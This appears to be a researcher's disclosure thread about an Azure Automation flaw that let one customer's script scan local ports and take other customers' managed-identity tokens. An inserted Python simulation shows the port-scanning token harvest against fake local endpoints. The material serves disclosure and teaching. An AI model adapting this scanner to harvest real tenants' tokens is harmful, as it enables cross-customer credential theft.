Scrolling through the endless list of Azure services, I’m looking for a new target
So I clicked “Automation Accounts”, not really knowing what it even meant. I quickly realized that this is basically a service for running Python & PowerShell scripts. 🧐 (2/10)
I uploaded a reverse shell script and started typing every Windows command I could remember
The real fun started when I found this suspicious log on the machine:
"Creating asset retrieval web service. [assetRetrievalEndpoint=http://127.0.0.1:40008]" (3/10)
This "asset retrieval service" turned out to be the server which serves you authentication tokens for your service managed identity.
Can you see the 🚩 though? (4/10)
The port, 40008? Why would someone choose such a random port?
Well...
Because other ports were taken. By other customers on the same machine!
You could just upload a script that tries every port in the environment and steals tokens belonging to other customers 😳 (5/10)
Those tokens hold the permissions customers assign to their automation accounts. That means if you’ve used the service to manage your VMs, an attacker could too 😉 (6/10)
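To make the design flaw in the last few tweets concrete, here is an added example that is not part of the thread and not Microsoft's code: a local simulation in which two "customers" each get a token endpoint bound to 127.0.0.1 on its own port, the layout the log line hints at, and a scanner run from one customer's sandbox walks the neighbouring ports. The tenant names, ports, token values and the X-Identity-Header secret scheme are all constructed for the demo; the thread says nothing about the real endpoint's request format or how the issue was fixed.

```python
# Added example (not from the thread): a local simulation of the design flaw
# described above. Two "customers" each get a token endpoint bound to 127.0.0.1
# on its own port. All names, ports, tokens and the X-Identity-Header scheme
# below are constructed for the demo.
import json
import secrets
import socket
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.error import HTTPError, URLError
from urllib.request import Request, urlopen


def free_port(start):
    """Return the first free loopback TCP port at or above `start`."""
    port = start
    while True:
        with socket.socket() as s:
            try:
                s.bind(("127.0.0.1", port))
                return port
            except OSError:
                port += 1


def start_token_server(tenant, port, required_secret=None):
    """Start a fake per-customer 'asset retrieval' endpoint on 127.0.0.1:port.

    If `required_secret` is given, callers must present it in X-Identity-Header
    (a constructed per-sandbox secret) or they get a 401.
    """
    token = f"constructed-token-for-{tenant}"  # stands in for a real access token

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            if required_secret is not None and \
                    self.headers.get("X-Identity-Header") != required_secret:
                self.send_response(401)
                self.end_headers()
                return
            body = json.dumps({"access_token": token, "tenant": tenant}).encode()
            self.send_response(200)
            self.send_header("Content-Type", "application/json")
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)

        def log_message(self, *args):  # keep the demo quiet
            pass

    server = HTTPServer(("127.0.0.1", port), Handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def scan_for_tokens(ports, header_secret=None, timeout=0.5):
    """Probe each loopback port; collect any endpoint that hands back an access_token.

    This is the 'script that tries every port' from the thread, run from inside
    one customer's sandbox. It knows only that sandbox's secret, if any.
    """
    headers = {"X-Identity-Header": header_secret} if header_secret else {}
    found = {}
    for port in ports:
        req = Request(f"http://127.0.0.1:{port}/", headers=headers)
        try:
            with urlopen(req, timeout=timeout) as resp:
                data = json.loads(resp.read())
        except (HTTPError, URLError, OSError, ValueError):
            continue  # nothing listening, rejected, or not a token endpoint
        if isinstance(data, dict) and "access_token" in data:
            found[port] = data
    return found


def run_demo(base_port=40008, hardened=False):
    """Return the tenants whose tokens customer A's scanner can obtain."""
    secret_a, secret_b = secrets.token_hex(8), secrets.token_hex(8)
    port_a = free_port(base_port)
    srv_a = start_token_server("customer-A", port_a, secret_a if hardened else None)
    port_b = free_port(port_a + 1)
    srv_b = start_token_server("customer-B", port_b, secret_b if hardened else None)
    try:
        # Customer A's runbook scans a window of ports around its own endpoint.
        found = scan_for_tokens(range(port_a, port_a + 20),
                                header_secret=secret_a if hardened else None)
    finally:
        for srv in (srv_a, srv_b):
            srv.shutdown()
            srv.server_close()
    return sorted(entry["tenant"] for entry in found.values())


if __name__ == "__main__":
    print("shared loopback, no per-sandbox secret:", run_demo(hardened=False))
    print("shared loopback, per-sandbox secret:   ", run_demo(hardened=True))
```

The unhardened run returns both tenants' tokens: binding to 127.0.0.1 is not a tenant boundary when several customers' sandboxes share one host, because every process on that host can reach every loopback port. The hardened run returns only customer A's token, showing how a per-sandbox credential narrows the blast radius, but that is a mitigation rather than the boundary itself; the cleaner design is to not share the loopback interface (or the host) between customers at all.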
The issue was found and reported all in the same day. Microsoft fixed it within 4 days, classified it as critical severity and awarded a $40,000 #BugBounty
But let's talk about lessons learned here for a moment: (7/10)
1. Cloud service vulnerabilities are scary. Think about all the companies potentially impacted by one single bug.
2. On the flip side, it was fixed within a few days with minimal work.
Microsoft took additional action to make sure this doesn't happen again: (8/10)
They performed an internal review and research of their service to hunt for different variants of this bug.
It's a simple software design oversight that anyone could have made. I believe we're going to see a lot more of those in the future. (9/10)